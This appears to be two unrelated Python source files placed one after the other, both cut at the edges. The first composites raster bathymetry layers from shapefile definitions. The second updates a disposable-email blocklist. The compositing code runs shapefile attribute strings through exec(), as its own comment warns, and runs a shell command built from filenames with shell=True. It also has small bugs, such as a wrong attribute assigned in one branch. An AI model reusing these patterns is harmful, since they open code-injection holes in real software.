an alpha value. This allows for blending/feathering between layers.
The default "data_mode" is simply overlay. Other data modes like "min" or
"max" are possible.
The default "alpha_mode" is "valid()" which is essentially opaque where there's
valid data, and transparent where there isn't. A second common option would
probably be "feather(<distance>)", which would take the valid areas of the layer,
and feather <distance> in from the edges.
The sources, data_mode, alpha_mode details are taken from a shapefile.
Alternatively, if a factory is given, it should be callable and will take a single argument -
a dict with the attributse for each source. The factory should then return the corresponding
Field.
TODO: there are cases where the alpha is so small that roundoff can cause
artifacts. Should push these cases to nan.
TODO: currently holes must be filled manually or after the fact. Is there a clean
way to handle that? Maybe a fill data mode?
Guide
-----
Create a polygon shapefile, with fields:
+------------+-----------+
+ priority | numeric |
+------------+-----------+
+ data_mode | string |
+------------+-----------+
+ alpha_mode | string |
+------------+-----------+
These names match the defaults to the constructor. Note that there is no
reprojection support -- the code assumes that the shapefile and all source
data are already in the target projection. Some code also assumes that it
is a square projection.
.. image:: images/composite-shp-table.png
Each polygon in the shapefile refers to a source dataset and defines where
that dataset will be used.
.. image:: images/composite-shp.png
.. image:: images/composite-shp-zoom.png
Datasets are processed as layers, building up from the lowest priority
to the highest priority. Higher priority sources generally overwrite
lower priority source, but that can be controlled by specifying
`data_mode`. The default is `overlay()`, which simple overwrites
the lower priority data. Other common modes are
* `min()`: use the minimum value between this source and lower
priority data. This layer will only *deepen* areas.
* `max()`: use the maximum value between this source and lower
priority data. This layer will only *raise* areas.
* `fill(dist)`: fill in holes up to `dist` wide in this datasets
before proceeding.
Multiple steps can be chained with commas, as in `fill(5.0),min()`, which
would fill in holes smaller than 5 spatial units (e.g. m), and then take
the minimum of this dataset and the existing data from previous (lower
priority) layers.
Another example:
.. image:: images/dcc-original.png
.. image:: images/dcc-dredged.png
"""
projection=None
def __init__(self,shp_fn=None,factory=None,
priority_field='priority',
data_mode='data_mode',
alpha_mode='alpha_mode',
shp_data=None,
shp_query=None,
target_date=None):
self.shp_fn = shp_fn
if shp_fn is not None: # read from shapefile
self.sources,self.projection=wkb2shp.shp2geom(shp_fn,return_srs=True,query=shp_query)
else:
self.sources=shp_data
if target_date is not None:
selA=np.array([ isnat(d) or d<=target_date
for d in self.sources['start_date']] )
selB=np.array([ isnat(d) or d>target_date
for d in self.sources['end_date']] )
orig_count=len(self.sources)
self.sources=self.sources[selA&selB]
new_count=len(self.sources)
log.info("Date filter selected %s of %s sources"%(new_count,orig_count))
if data_mode is not None:
self.data_mode=self.sources[data_mode]
else:
self.data_mode=['overlay()']*len(self.sources)
if alpha_mode is not None:
self.alpha_mode=self.sources[alpha_mode]
else:
self.data_mode=['valid()']*len(self.sources)
# Impose default values on those:
for i in range(len(self.sources)):
if self.alpha_mode[i]=='':
self.alpha_mode[i]='valid()'
if self.data_mode[i]=='':
self.data_mode[i]='overlay()'
super(CompositeField,self).__init__()
self.factory = factory
self.delegate_list=[None]*len(self.sources)
self.src_priority=self.sources[priority_field]
self.priorities=np.unique(self.src_priority)
def bounds(self):
raise Exception("For now, you have to specify the bounds when gridding a BlenderField")
def load_source(self,i):
if self.delegate_list[i] is None:
self.delegate_list[i] = self.factory( self.sources[i] )
return self.delegate_list[i]
def to_grid(self,nx=None,ny=None,bounds=None,dx=None,dy=None,
mask_poly=None,stackup=False):
""" render the layers to a SimpleGrid tile.
nx,ny: number of pixels in respective dimensions
bounds: xxyy bounding rectangle.
dx,dy: size of pixels in respective dimensions.
mask_poly: a shapely polygon. only points inside this polygon
will be generated.
stackup: 'return': return a list of the layers involve in compositing
this tile.
'plot': make a figure showing the evolution of the layers as they're
stacked up.
"""
# boil the arguments down to dimensions
if bounds is None:
xmin,xmax,ymin,ymax = self.bounds()
else:
if len(bounds) == 2:
xmin,ymin = bounds[0]
xmax,ymax = bounds[1]
else:
xmin,xmax,ymin,ymax = bounds
if nx is None:
nx=1+int(np.round((xmax-xmin)/dx))
ny=1+int(np.round((ymax-ymin)/dy))
if stackup:
stack=[]
# in case it came in as 2x2
bounds=[xmin,xmax,ymin,ymax]
# allocate the blank starting canvas
result_F =np.ones((ny,nx),'f8')
result_F[:]=-999 # -999 so we don't get nan contamination
result_data=SimpleGrid(extents=bounds,F=result_F,projection=self.projection)
result_alpha=result_data.copy()
result_alpha.F[:]=0.0
# Which sources to use, and in what order?
box=geometry.box(bounds[0],bounds[2],bounds[1],bounds[3])
if mask_poly is not None:
box=box.intersection(mask_poly)
# Which sources are relevant?
relevant_srcs=np.nonzero( [ box.intersects(geom)
for geom in self.sources['geom'] ])[0]
# omit negative priorities
relevant_srcs=relevant_srcs[ self.src_priority[relevant_srcs]>=0 ]
# Starts with lowest, goes to highest
order = np.argsort(self.src_priority[relevant_srcs])
ordered_srcs=relevant_srcs[order]
# Use to use ndimage.distance_transform_bf.
# This appears to give equivalent results (at least for binary-valued
# inputs), and runs about 80x faster on a small-ish input.
dist_xform=ndimage.distance_transform_edt
for src_i in ordered_srcs:
log.info(self.sources['src_name'][src_i])
log.info(" data mode: %s alpha mode: %s"%(self.data_mode[src_i],
self.alpha_mode[src_i]))
source=self.load_source(src_i)
src_data = source.to_grid(bounds=bounds,dx=dx,dy=dy)
src_alpha= SimpleGrid(extents=src_data.extents,
F=np.ones(src_data.F.shape,'f8'))
src_geom=self.sources['geom'][src_i]
if mask_poly is not None:
src_geom=src_geom.intersection(mask_poly)
mask=src_alpha.polygon_mask(src_geom)
src_alpha.F[~mask] = 0.0
# Use nan's to mask data, rather than masked arrays.
# Convert as necessary here:
if isinstance(src_data.F,np.ma.masked_array):
src_data.F=src_data.F.filled(np.nan)
# create an alpha tile. depending on alpha_mode, this may draw on the lower data,
# the polygon and/or the data tile.
# modify the data tile according to the data mode - so if the data mode is
# overlay, do nothing. but if it's max, the resulting data tile is the max
# of itself and the lower data.
# composite the data tile, using its alpha to blend with lower data.
# the various operations
def min():
""" new data will only decrease values
"""
valid=result_alpha.F>0
src_data.F[valid]=np.minimum( src_data.F[valid],result_data.F[valid] )
def max():
""" new data will only increase values
"""
valid=result_alpha.F>0
src_data.F[valid]=np.maximum( src_data.F[valid],result_data.F[valid] )
def fill(dist):
"fill in small missing areas"
pixels=int(round(float(dist)/dx))
# for fill, it may be better to clip this to 1 pixel, rather than
# bail when pixels==0
if pixels>0:
niters=np.maximum( pixels//3, 2 )
src_data.fill_by_convolution(iterations=niters)
def blur(dist):
"smooth data channel with gaussian filter - this allows spreading beyond original poly!"
pixels=int(round(float(dist)/dx))
#import pdb
#pdb.set_trace()
Fzed=src_data.F.copy()
valid=np.isfinite(Fzed)
Fzed[~valid]=0.0
weights=ndimage.gaussian_filter(1.0*valid,pixels)
blurred=ndimage.gaussian_filter(Fzed,pixels)
blurred[weights<0.5]=np.nan
blurred[weights>=0.5] /= weights[weights>=0.5]
src_data.F=blurred
def diffuser():
self.diffuser(source,src_data,src_geom,result_data)
def ortho_diffuser(res,aniso=1e-5):
self.ortho_diffuser(res=res,aniso=aniso,source=source,
src_data=src_data,src_geom=src_geom,result_data=result_data)
def overlay():
pass
# alpha channel operations:
def valid():
# updates alpha channel to be zero where source data is missing.
data_missing=np.isnan(src_data.F)
src_alpha.F[data_missing]=0.0
def blur_alpha(dist):
"smooth alpha channel with gaussian filter - this allows spreading beyond original poly!"
pixels=int(round(float(dist)/dx))
if pixels>0:
src_alpha.F=ndimage.gaussian_filter(src_alpha.F,pixels)
def feather_in(dist):
"linear feathering within original poly"
pixels=int(round(float(dist)/dx))
if pixels>0:
Fsoft=dist_xform(src_alpha.F)
src_alpha.F = (Fsoft/pixels).clip(0,1)
def buffer(dist):
"buffer poly outwards (by pixels)"
# Could do this by erosion/dilation. but using
# distance is a bit more compact (maybe slower, tho)
pixels=int(round(float(dist)/dx))
if pixels>0:
# Like feather_out.
# Fsoft gets distance to a 1 pixel
Fsoft=dist_xform(1-src_alpha.F)
# is this right, or does it need a 1 in there?
src_alpha.F = (pixels-Fsoft).clip(0,1)
elif pixels<0:
pixels=-pixels
# Fsoft gets the distance to a zero pixel
Fsoft=dist_xform(src_alpha.F)
src_alpha.F = (Fsoft-pixels).clip(0,1)
feather=feather_in
def feather_out(dist):
pixels=int(round(float(dist)/dx))
if pixels>0:
Fsoft=dist_xform(1-src_alpha.F)
src_alpha.F = (1-Fsoft/pixels).clip(0,1)
# dangerous! executing code from a shapefile!
for mode in [self.data_mode[src_i],self.alpha_mode[src_i]]:
if mode is None or mode.strip() in ['',b'']: continue
# This is getting a SyntaxError when using python 2.
exec(mode) # used to be eval.
data_missing=np.isnan(src_data.F)
src_alpha.F[data_missing]=0.0
cleaned=src_data.F.copy()
cleaned[data_missing]=-999 # avoid nan contamination.
assert np.allclose( result_data.extents, src_data.extents )
assert np.all( result_data.F.shape==src_data.F.shape )
# 2018-12-06: this is how it used to work, but this is problematic
# when result_alpha is < 1.
# result_data.F = result_data.F *(1-src_alpha.F) + cleaned*src_alpha.F
# where result_alpha=1.0, then we want to blend with src_alpha and 1-src_alpha.
# if result_alpha=0.0, then we take src wholesale, and carry its alpha through.
#
total_alpha=result_alpha.F*(1-src_alpha.F) + src_alpha.F
result_data.F = result_data.F * result_alpha.F *(1-src_alpha.F) + cleaned*src_alpha.F
# to avoid contracting data towards zero, have to normalize data by the total alpha.
valid=total_alpha>1e-10 # avoid #DIVZERO
result_data.F[valid] /= total_alpha[valid]
result_alpha.F = total_alpha
if stackup:
stack.append( (self.sources['src_name'][src_i],
result_data.copy(),
src_alpha.copy() ) )
# fudge it a bit, and allow semi-transparent data back out, but
# at least nan out the totally transparent stuff.
result_data.F[ result_alpha.F==0 ] = np.nan
if stackup=='return':
return result_data,stack
elif stackup=='plot':
self.plot_stackup(result_data,stack)
return result_data
def ortho_diffuser(self,res,aniso,source,src_data,src_geom,result_data):
"""
Strong curvilinear anisotropic interpolatio
"""
from . import interp_orthogonal
oink=interp_orthogonal.OrthoInterpolator(region=src_geom,
background_field=result_data,
anisotropy=aniso,
nom_res=res)
fld=oink.field()
rast=fld.to_grid(bounds=result_data.bounds(),
dx=result_data.dx,dy=result_data.dy)
src_data.F[:,:]=rast.F
def diffuser(self,src,src_data,src_geom,result_data):
"""
src: the source for the layer. Ignored unless it's an XYZField
in which case the point samples are included.
src_data: where the diffused field will be saved
src_geom: polygon to work in
result_data: the stackup result from previous layers
"""
from scipy import sparse
from ..grid import triangulate_hole,quad_laplacian, unstructured_grid
from . import linestring_utils
dx=3*src_data.dx # rough guess
curve=linestring_utils.resample_linearring(np.array(src_geom.exterior),
dx,closed_ring=1)
g=unstructured_grid.UnstructuredGrid()
nodes,edges=g.add_linestring(curve,closed=True)
g=triangulate_hole.triangulate_hole(g,nodes=nodes,hole_rigidity='all',method='rebay')
bnodes=g.boundary_cycle()
bvals=result_data(g.nodes['x'][bnodes])
nd=quad_laplacian.NodeDiscretization(g)
dirich={ n:val
for n,val in zip(bnodes,bvals) }
if isinstance(src,XYZField):
for xy,z in zip(src.X,src.F):
c=g.select_cells_nearest([x,y],inside=True)
if c is None: continue
n=g.select_nodes_nearest([x,y])
dirich[n]=z
M,b=nd.construct_matrix(op='laplacian',dirichlet_nodes=dirich)
diffed=sparse.linalg.spsolve(M.tocsr(),b)
fld=XYZField(X=g.nodes['x'],F=diffed)
fld._tri=g.mpl_triangulation()
rast=fld.to_grid(bounds=result_data.bounds(),
dx=result_data.dx,dy=result_data.dy)
src_data.F[:,:]=rast.F
return rast
def plot_stackup(self,result_data,stack,num=None,z_factor=5.,cmap='jet'):
plt.figure(num=num).clf()
nrows=ncols=np.sqrt(len(stack))
nrows=int(np.ceil(nrows))
ncols=int(np.floor(ncols))
if nrows*ncols<len(stack): ncols+=1
fig,axs=plt.subplots(nrows,ncols,num=num,squeeze=False)
for ax,(name,data,alpha) in zip( axs.ravel(), stack ):
data.plot(ax=ax,vmin=0,vmax=3.5,cmap=cmap)
data.plot_hillshade(ax=ax,z_factor=z_factor)
ax.axis('off')
ax.set_title(name)
for ax in axs.ravel()[len(stack):]:
ax.axis('off')
fig.subplots_adjust(left=0,right=1,top=0.95,bottom=0,hspace=0.08)
# fig.
return fig
class MultiRasterField(Field):
""" Given a collection of raster files at various resolutions and with possibly overlapping
extents, manage a field which picks from the highest resolution raster for any given point.
Assumes that any point of interest is covered by at least one field (though there may be slower support
coming for some sort of nearest valid usage).
There is no blending for point queries! If two fields cover the same spot, the value taken from the
higher resolution field will be returned.
Basic bilinear interpolation will be utilized for point queries.
Edge queries will resample the edge at the resolution of the highest datasource, and then proceed with
those point queries
Cell/region queries will have to wait for another day
Some effort is made to keep only the most-recently used rasters in memory, since it is not feasible
to load all rasters at one time. to this end, it is most efficient for successive queries to have some
spatial locality.
"""
# If finite, any point sample greater than this value will be clamped to this value
clip_max = np.inf
# Values below this will be interpreted is missing data
min_valid = None
order = 1 # interpolation order
# After clipping, this value will be added to the result.
# probably shouldn't use this - domain.py takes care of adding in the bathymetry offset
# and reversing the sign (so everything becomes positive)
offset = 0.0 # BEWARE!!! read the comment.
# any: raise an exception if any raster_file_pattern fails to find any
# matches
# all: raise an exception if all patterns come up empty
# False: silently proceed with no matches.
error_on_null_input='any' # 'all', or False
def __init__(self,raster_file_patterns,**kwargs):
self.__dict__.update(kwargs)
Field.__init__(self)
raster_files = []
for patt in raster_file_patterns:
if isinstance(patt,tuple):
patt,pri=patt
else:
pri=0 # default priority
matches=glob.glob(patt)
if len(matches)==0 and self.error_on_null_input=='any':
raise Exception("Pattern '%s' got no matches"%patt)
raster_files += [ (m,pri) for m in matches]
if len(raster_files)==0 and self.error_on_null_input=='all':
raise Exception("No patterns got matches")
self.raster_files = raster_files
self.prepare()
def bounds(self):
""" Aggregate bounds """
all_extents=self.sources['extent']
return [ all_extents[:,0].min(),
all_extents[:,1].max(),
all_extents[:,2].min(),
all_extents[:,3].max() ]
def prepare(self):
# find extents and resolution of each dataset:
sources=np.zeros( len(self.raster_files),
dtype=[ ('field','O'),
('filename','O'),
('extent','f8',4),
('resolution','f8'),
('resx','f8'),
('resy','f8'),
('order','f8'),
('last_used','i4') ] )
for fi,(f,pri) in enumerate(self.raster_files):
extent,resolution = GdalGrid.metadata(f)
sources['extent'][fi] = extent
sources['resolution'][fi] = max(resolution[0],resolution[1])
sources['resx'][fi] = resolution[0]
sources['resy'][fi] = resolution[1]
# negate so that higher priority sorts to the beginning
sources['order'][fi] = -pri
sources['field'][fi]=None
sources['filename'][fi]=f
sources['last_used'][fi]=-1
self.sources = sources
# -1 means the source isn't loaded. non-negative means it was last used when serial
# was that value. overflow danger...
self.build_index()
def polygon_mask(self,poly,crop=True,return_values=False):
"""
Mimic SimpleGrid.polygon_mask
Requires return_values==True, since a bitmask doesn't make
sense over a stack of layers.
return_values: must be True, and will
return just the values of F that fall inside poly.
"""
assert crop==True,"MultiRasterField only implements crop=True behavior"
assert return_values==True,"MultiRasterField only makes sense for return_values=True"
xyxy=poly.bounds
xxyy=[xyxy[0], xyxy[2], xyxy[1], xyxy[3]]
tile=self.extract_tile(xxyy)
return tile.polygon_mask(poly,crop=False,return_values=True)
# Thin wrapper to make a multiraster field look like one giant high resolution
# raster.
@property
def dx(self):
return np.abs(self.sources['resx']).min()
@property
def dy(self):
# many files report negative dy!
return np.abs(self.sources['resy']).min()
def crop(self,rect=None):
return self.to_grid(bounds=rect)
def build_index(self):
# Build a basic index that will return the overlapping dataset for a given point
# these are x,x,y,y
tuples = [(i,extent,None)
for i,extent in enumerate(self.sources['extent'])]
self.index = RectIndex(tuples,interleaved=False)
def report(self):
""" Short text representation of the layers found and their resolutions
"""
print("Raster sources:")
print(" Idx Order Res File")
for fi,rec in enumerate(self.sources):
print("%4d %4.1f %6.1f: %s"%(fi,
rec['order'],
rec['resolution'],
rec['filename']))
# TODO:
# For large sources rasters, replace them with a list of tiles, so we can load
# and cache smaller tiles.
max_count = 20
open_count = 0
serial = 0
def source(self,i):
""" LRU based cache of the datasets
"""
if self.sources['field'][i] is None:
if self.open_count >= self.max_count:
# Have to choose someone to close.
current = np.nonzero(self.sources['last_used']>=0)[0]
victim = current[ np.argmin( self.sources['last_used'][current] ) ]
# print "Will evict source %d"%victim
self.sources['last_used'][victim] = -1
self.sources['field'][victim] = None
self.open_count -= 1
# open the new guy:
self.sources['field'][i] = src = GdalGrid(self.sources['filename'][i])
# Need to treat this here, since otherwise those values may propagate
# in interpolation and then it will be hard to detect them.
src.F[ src.F < self.min_valid ] = np.nan
self.open_count += 1
self.serial += 1
self.sources['last_used'][i] = self.serial
return self.sources['field'][i]
def value_on_point(self,xy):
hits=self.ordered_hits(xy[xxyy])
if len(hits) == 0:
return np.nan
v = np.nan
for hit in hits:
src = self.source(hit)
# Here we should be asking for some kind of basic interpolation
v = src.interpolate( np.array([xy]), interpolation='linear' )[0]
if np.isnan(v):
continue
if v > self.clip_max:
v = self.clip_max
return v
# print("Bad sample at point ",xy)
return v
def value(self,X):
""" X must be shaped (...,2)
"""
X = np.array(X)
orig_shape = X.shape
X = X.reshape((-1,2))
newF = np.zeros( X.shape[0],np.float64 )
for i in range(X.shape[0]):
if i > 0 and i % 2000 == 0:
print("%d/%d"%(i,X.shape[0]))
newF[i] = self.value_on_point( X[i] )
newF = newF.reshape(orig_shape[:-1])
if newF.ndim == 0:
return float(newF)
else:
return newF
def value_on_edge(self,e,samples=None):
"""
Subsample the edge, using an interval based on the highest resolution overlapping
dataset. Average and return...
"""
pmin = e.min(axis=0)
pmax = e.max(axis=0)
hits=self.ordered_hits( [pmin[0],pmax[0],pmin[1],pmax[1]] )
if len(hits) == 0:
return np.nan
res = self.sources['resolution'][hits].min()
samples = int( np.ceil( norm(e[0] - e[1])/res) )
x=np.linspace(e[0,0],e[1,0],samples)
y=np.linspace(e[0,1],e[1,1],samples)
X = np.array([x,y]).transpose()
# old way - about 1.3ms per edge over 100 edges
# return nanmean(self.value(X))
# inlining -
# in order of resolution, query all the points at once from each field.
edgeF = np.nan*np.ones( X.shape[0],np.float64 )
for hit in hits:
missing = np.isnan(edgeF)
# now redundant with edit of src.F
#if self.min_valid is not None:
# missing = missing | (edgeF<self.min_valid)
src = self.source(hit)
# for the moment, keep the nearest interpolation
edgeF[missing] = src.interpolate( X[missing],interpolation='linear' )
if np.all(np.isfinite(edgeF)):
break
edgeF = np.clip(edgeF,-np.inf,self.clip_max) # ??
return np.nanmean(edgeF)
def ordered_hits(self,xxyy):
hits = self.index.intersection( xxyy )
if isinstance(hits, types.GeneratorType):
# so translate that into a list like we used to get.
hits = list(hits)
hits = np.array(hits)
if len(hits) == 0:
return []
# include filename here to resolve ties, avoiding the fallback behavior which
# may error out when comparing None
hits = hits[ np.argsort( self.sources[hits], order=('order','resolution','filename')) ]
return hits
def extract_tile(self,xxyy=None,res=None):
""" Create the requested tile from merging the sources. Resolution defaults to
resolution of the highest resolution source that falls inside the requested region
"""
return self.to_grid(bounds=xxyy,dx=res,dy=res)
def to_grid(self,nx=None,ny=None,interp='linear',bounds=None,dx=None,dy=None,valuator='value'):
"""
Extract data in a grid. currently only nearest, no linear interpolation.
"""
# This used to be extract_tile, but the interface of to_grid is broader, so better
# to have extract_tile be a special case of to_grid.
xxyy=bounds
if xxyy is None:
xxyy=self.bounds()
xxyy=as_xxyy(xxyy)
hits = self.ordered_hits(xxyy)
if not len(hits):
# this can happen esp. when generating tiles for a larger dataset.
log.warning("to_grid: no datasets overlap, will return all nan")
if dx is None or dy is None:
raise Exception("No hits, and dx/dy not specified so resolution is unknown")
if dx is None:
dx=self.sources['resolution'][hits].min()
if dy is None:
dy=self.sources['resolution'][hits].min()
# half-pixel alignment-
# field.SimpleGrid expects extents which go to centers of pixels.
# x and y are inclusive of the end pixels (so for exactly abutting rects, there will be 1 pixel
# of overlap)
x=np.arange( xxyy[0],xxyy[1]+dx,dx)
y=np.arange( xxyy[2],xxyy[3]+dy,dy)
targetF = np.nan*np.zeros( (len(y),len(x)), np.float64)
pix_extents = [x[0],x[-1], y[0],y[-1] ]
target = SimpleGrid(extents=pix_extents,F=targetF)
# iterate over overlapping DEMs until we've filled in all the holes
# might want some feature where coarse data are only input at their respective
# cell centers, and then everything is blended,
# or maybe that as dx increases, we allow a certain amount of blending first
# the idea being that it there's a 5m hole in some lidar, it's better to blend the
# lidar than to query a 100m dataset.
# extend the extents to consider width of pixels (this at least makes the output
# register with the inputs)
for hit in hits:
src = self.source(hit)
src_x,src_y = src.xy()
src_dx,src_dy = src.delta()
# maps cols in the destination to cols in this source
# map_coordinates wants decimal array indices
# x has the utm easting for each column to extract
# x-src_x: easting relative to start of src tile
dec_x = (x-src_x[0]) / src_dx
dec_y = (y-src_y[0]) / src_dy
if self.order==0:
dec_x = np.floor( (dec_x+0.5) )
dec_y = np.floor( (dec_y+0.5) )
# what range of the target array falls within this tile
col_range = np.nonzero( (dec_x>=0) & (dec_x <= len(src_x)-1))[0]
if len(col_range):
col_range = col_range[ [0,-1]]
else:
continue
row_range = np.nonzero( (dec_y>=0) & (dec_y <= len(src_y)-1))[0]
if len(row_range):
row_range=row_range[ [0,-1]]
else:
continue
col_slice = slice(col_range[0],col_range[1]+1)
row_slice = slice(row_range[0],row_range[1]+1)
dec_x = dec_x[ col_slice ]
dec_y = dec_y[ row_slice ]
C,R = np.meshgrid( dec_x,dec_y )
newF = ndimage.map_coordinates(src.F, [R,C],order=self.order)
# only update missing values
missing = np.isnan(target.F[ row_slice,col_slice ])
# Now redundant with updating src.F above
# if self.min_valid is not None:
# # Also ignore out-of-bounds values from newF
# missing = missing & (newF>=self.min_valid)
target.F[ row_slice,col_slice ][missing] = newF[missing]
return target
class FunctionField(Field):
""" wraps an arbitrary function
function must take one argument, X, which has
shape [...,2]
"""
def __init__(self,func):
self.func = func
def value(self,X):
X=np.asanyarray(X)
return self.func(X)
# used to be in its own file
class TileMaker(object):
""" Given a field, create gridded tiles of the field, including some options for blending, filling,
cropping, etc.
"""
tx = 1000 # physical size, x, for a tile
ty = 1000 # physical size, y, for a tile
dx = 2 # pixel width
dy = 2 # pixel height
pad = 50 # physical distance to pad tiles in each of 4 directions
fill_iterations = 10
smoothing_iterations = 5
force = False # overwrite existing output files
output_dir = "."
filename_fmt = "%(left).0f-%(bottom).0f.tif"
quantize=True # whether to quantize bounds to tx
# A function(SimpleGrid,**kw) => SimpleGrid
# If set, this is called after rendering each tile, but before the tile
# is unpadded. see code below for the keywords supplied.
post_render=None
def __init__(self,f,**kwargs):
""" f: the field to be gridded
"""
self.f = f
set_keywords(self,kwargs)
if not os.path.exists(self.output_dir):
os.mkdir(self.output_dir)
def tile(self,xmin=None,ymin=None,xmax=None,ymax=None):
self.tile_fns=[]
if (xmin is None) or (xmax is None) or (ymin is None) or (ymax is None):
# some fields don't know their bounds, so hold off calling
# this unless we have to.
bounds=self.f.bounds()
if xmin is None: xmin=bounds[0]
if xmax is None: xmax=bounds[1]
if ymin is None: ymin=bounds[2]
if ymax is None: ymax=bounds[3]
if self.quantize:
xmin=self.tx*np.floor(xmin/self.tx)
xmax=self.tx*np.ceil( xmax/self.tx)
ymin=self.ty*np.floor(ymin/self.ty)
ymax=self.ty*np.ceil( ymax/self.ty)
nx = int(np.ceil((xmax - xmin)/self.tx))
ny = int(np.ceil((ymax - ymin)/self.ty))
print("Tiles: %d x %d"%(nx,ny))
for xi in range(nx):
for yi in range(ny):
ll = [xmin+xi*self.tx,
ymin+yi*self.ty]
ur = [ll[0]+self.tx,
ll[1]+self.ty]
# populate some local variables for giving to the filename format
left=ll[0]
right=ll[0]+self.tx
bottom=ll[1]
top = ll[1]+self.ty
dx = self.dx
dy = self.dy
bounds = np.array([left,right,bottom,top])
print("Tile ",bounds)
output_fn = os.path.join(self.output_dir,self.filename_fmt%locals())
self.tile_fns.append(output_fn)
print("Looking for output file: %s"%output_fn)
if self.force or not os.path.exists(output_fn):
pad_x=self.pad/self.dx
pad_y=self.pad/self.dy
pad_bounds=np.array([left-pad_x,right+pad_x, bottom-pad_y, top+pad_y])
blend = self.f.to_grid(dx=self.dx,dy=self.dy,bounds=pad_bounds)
if self.fill_iterations + self.smoothing_iterations > 0:
print("Filling and smoothing")
blend.fill_by_convolution(self.fill_iterations,self.smoothing_iterations)
print("Saving")
if self.post_render:
blend=self.post_render(blend,output_fn=output_fn,bounds=bounds,pad_bounds=pad_bounds)
if self.pad>0:
blend=blend.crop(bounds)
blend.write_gdal( output_fn )
print("Done")
else:
print("Already exists. Skipping")
def merge(self):
# and then merge them with something like:
# if the file exists, its extents will not be updated.
output_fn=os.path.join(self.output_dir,'merged.tif')
os.path.exists(output_fn) and os.unlink(output_fn)
log.info("Merging using gdal_merge.py")
# Try importing gdal_merge directly, which will more reliably
# find the right library since if we got this far, python already
# found gdal okay. Unfortunately it's not super straightforward
# to get the right way of importing this, since it's intended as
# a script and not a module.
try:
from Scripts import gdal_merge
except ImportError:
log.info("Failed to import gdal_merge, will try subprocess")
gdal_merge=None
cmd=["python","gdal_merge.py","-init","nan","-a_nodata","nan",
"-o",output_fn]+self.tile_fns
log.info(" ".join(cmd))
if gdal_merge:
gdal_merge.main(argv=cmd[1:])
else:
# more likely that gdal_merge.py is on PATH, than the script itself will
# be seen by python, so drop python, and invoke script directly.
subprocess.call(" ".join(cmd[1:]),shell=True)
if __name__ == '__main__':
topobathy = "/home/rusty/classes/research/spatialdata/us/ca/suntans/bathymetry/ca-topobathy/85957956/85957956/hdr.adf"
corrected_fn = "/home/rusty/classes/research/spatialdata/us/ca/suntans/bathymetry/usgs/southbay-corrected.xyz"
corrected = XYZText(corrected_fn,projection="EPSG:26910")
corrected2 = corrected.rectify()
tile = GdalGrid(topobathy)
zoom_ll = corrected.bounds_in_cs(tile.projection())
tile_cropped = tile.crop(zoom_ll)
tile_utm = tile_cropped.reproject(to_projection=corrected.projection())
# arithmetic interface may change...
# diff = tile_utm - corrected2
corr_on_tile = tile_utm.regrid(corrected2)
corr_cv = CurvilinearGrid(tile_utm.X,corr_on_tile,projection=tile_utm.projection())
subplot(211)
corrected.plot(vmin=-10,vmax=2)
subplot(212)
tile_utm.plot(vmin=-10,vmax=2)
|
updater.py
|
from http.client import HTTPResponse
from logging import getLogger
from pathlib import Path
from tempfile import gettempdir, gettempprefix
from threading import Thread
from time import time
from typing import Callable, Optional
from urllib.error import HTTPError
from urllib.request import Request, urlopen
try:
from os import geteuid
except ImportError:
def geteuid():
'Windows does not have `os.geteuid()`.'
return '1'
LOGGER = getLogger(__name__)
TMP_PATH = Path(gettempdir()).joinpath(
f'{gettempprefix()}-py3-validate-email-{geteuid()}')
TMP_PATH.mkdir(exist_ok=True)
BLACKLIST_URL = (
'https://raw.githubusercontent.com/martenson/disposable-email-domains/'
'master/disposable_email_blocklist.conf')
LIB_PATH_DEFAULT = Path(__file__).resolve().parent.joinpath('data')
BLACKLIST_FILEPATH_INSTALLED = LIB_PATH_DEFAULT.joinpath('blacklist.txt')
BLACKLIST_FILEPATH_TMP = TMP_PATH.joinpath('blacklist.txt')
ETAG_FILEPATH_INSTALLED = LIB_PATH_DEFAULT.joinpath('blacklist.etag.txt')
ETAG_FILEPATH_TMP = TMP_PATH.joinpath('blacklist.etag.txt')
LOCK_PATH = TMP_PATH.joinpath('blacklistupdater.lock')
class BlacklistUpdater(object):
"""
Optionally auto-update the built-in `blacklist.txt`, while using
a temporary place to put the newly downloaded one to avoid read-only
filesystem errors. If the installed `blacklist.txt` is fresh enough
don't look for newer versions.
"""
_refresh_when_older_than: int = 5 * 24 * 60 * 60 # 5 days
def _read_etag(self) -> Optional[str]:
'Read the etag header from the stored etag file when exists.'
for path in [ETAG_FILEPATH_TMP, ETAG_FILEPATH_INSTALLED]:
try:
return path.read_text().strip()
except FileNotFoundError:
pass
@property
def _is_old(self) -> bool:
'Return `True` if the locally stored file is old.'
true_when_older_than = time() - self._refresh_when_older_than
for path in [BLACKLIST_FILEPATH_TMP, BLACKLIST_FILEPATH_INSTALLED]:
try:
return path.stat().st_ctime < true_when_older_than
except FileNotFoundError:
pass
return True # no file found at all
def _get_headers(self, force_update: bool = False) -> dict:
'Compile a header with etag if available.'
headers = dict()
if force_update:
return headers
etag = self._read_etag()
if not etag:
return headers
headers['If-None-Match'] = etag
return headers
def _download(self, headers: dict, blacklist_path: Path, etag_path: Path):
'Downlad and store blacklist file.'
LOGGER.debug(msg=f'Checking {BLACKLIST_URL}')
request = Request(url=BLACKLIST_URL, headers=headers)
response = urlopen(url=request) # type: HTTPResponse
# New data available
LOGGER.debug(msg=f'Writing response into {blacklist_path}')
blacklist_path.write_bytes(response.fp.read())
if 'ETag' in response.headers:
LOGGER.debug(msg=f'Storing ETag response into {etag_path}.')
etag_path.write_text(response.headers['ETag'])
def _install(self):
"""
Download and store the blacklist file and the matching etag file
into the library path. This is executed from setup.py upon
installation of the library. Don't call this in your
application.
"""
LIB_PATH_DEFAULT.mkdir(exist_ok=True)
self._download(
headers={}, blacklist_path=BLACKLIST_FILEPATH_INSTALLED,
etag_path=ETAG_FILEPATH_INSTALLED)
def _process(self, force: bool = False):
'Start optionally updating the blacklist.txt file, while locked.'
if not force and not self._is_old:
LOGGER.debug(msg='Not updating because file is fresh enough.')
return
try:
self._download(
headers=self._get_headers(force_update=force),
blacklist_path=BLACKLIST_FILEPATH_TMP,
etag_path=ETAG_FILEPATH_TMP)
except HTTPError as exc:
if exc.code == 304:
# Not modified, update date on the tmp file
LOGGER.debug(msg='Local file is fresh enough (same ETag).')
BLACKLIST_FILEPATH_TMP.touch()
return
raise
def process(
self, force: bool = False, callback: Optional[Callable] = None):
'Start optionally updating the blacklist.txt file.'
# Locking to avoid multi-process update on multi-process startup
# Import filelock locally because this module is als used by setup.py
from filelock import FileLock
with FileLock(lock_file=LOCK_PATH):
self._process(force=force)
# Always execute callback because multiple processes can have
# different versions of blacklists (one before, one after
# updating)
if callback:
